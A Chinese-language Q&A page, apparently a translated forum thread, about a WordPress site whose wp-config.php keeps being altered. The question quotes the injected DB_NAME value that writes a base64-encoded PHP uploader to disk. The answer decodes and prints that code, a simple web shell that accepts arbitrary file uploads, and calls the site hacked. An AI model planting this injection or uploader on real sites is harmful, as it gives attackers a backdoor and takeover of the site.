php - wp-config.php 不断更改数据库名称、用户名和密码

问题描述

我正在使用 WordPress 和一个名为 WP-Rocket 的插件来优化我的网站。从两天前开始，wp-config.php 文件不断将数据库名称更改为如下代码。

**Original DB name was define('DB_NAME', 'db1');**

但改为

**define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRk
lMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYi
kiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW
5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWy
JmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2
hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi
4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\')); /*');</i>

用户名和密码也更改为“用户”和“密码”，如下所示。

/** MySQL database username */

define('DB_USER', 'user');

/** MySQL database password */

define('DB_PASSWORD', 'password');</i>

标签： phpwordpress

我认为你有一个被黑的网站。如果您解码（https://www.base64decode.org/）您将获得的代码：

  <?php
  echo "This shit works!";
  if (isset($_FILES["filename"]))
  {
     if($_FILES["filename"]["size"] > 1024*3*1024)
   {
     echo ("File too large (more than 3Mb)");
     exit;
   }
   if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
   {
     move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
     echo ("<br>Done!<br>");
   } else {
      echo("<br>Error! ".$php_errormsg."<br>");
   }
}
?>

该代码只是关于上传文件大小的消息，但我认为它是更多被黑客入侵的 base64 文件部分的一部分。

所以，现在你有两个选择：1）雇人。

2) 或者您可以逐步浏览互联网上的指南：这是您可以在 wp.org 上查看的第一个指南。

https://codex.wordpress.org/FAQ_My_site_was_hacked#Some_steps_to_take

提示：如果一个网站被黑客入侵，你应该首先让它对访问者不可用，这样没有人会被感染。

php - wp-config.php 不断更改数据库名称、用户名和密码

问题描述

解决方案

推荐阅读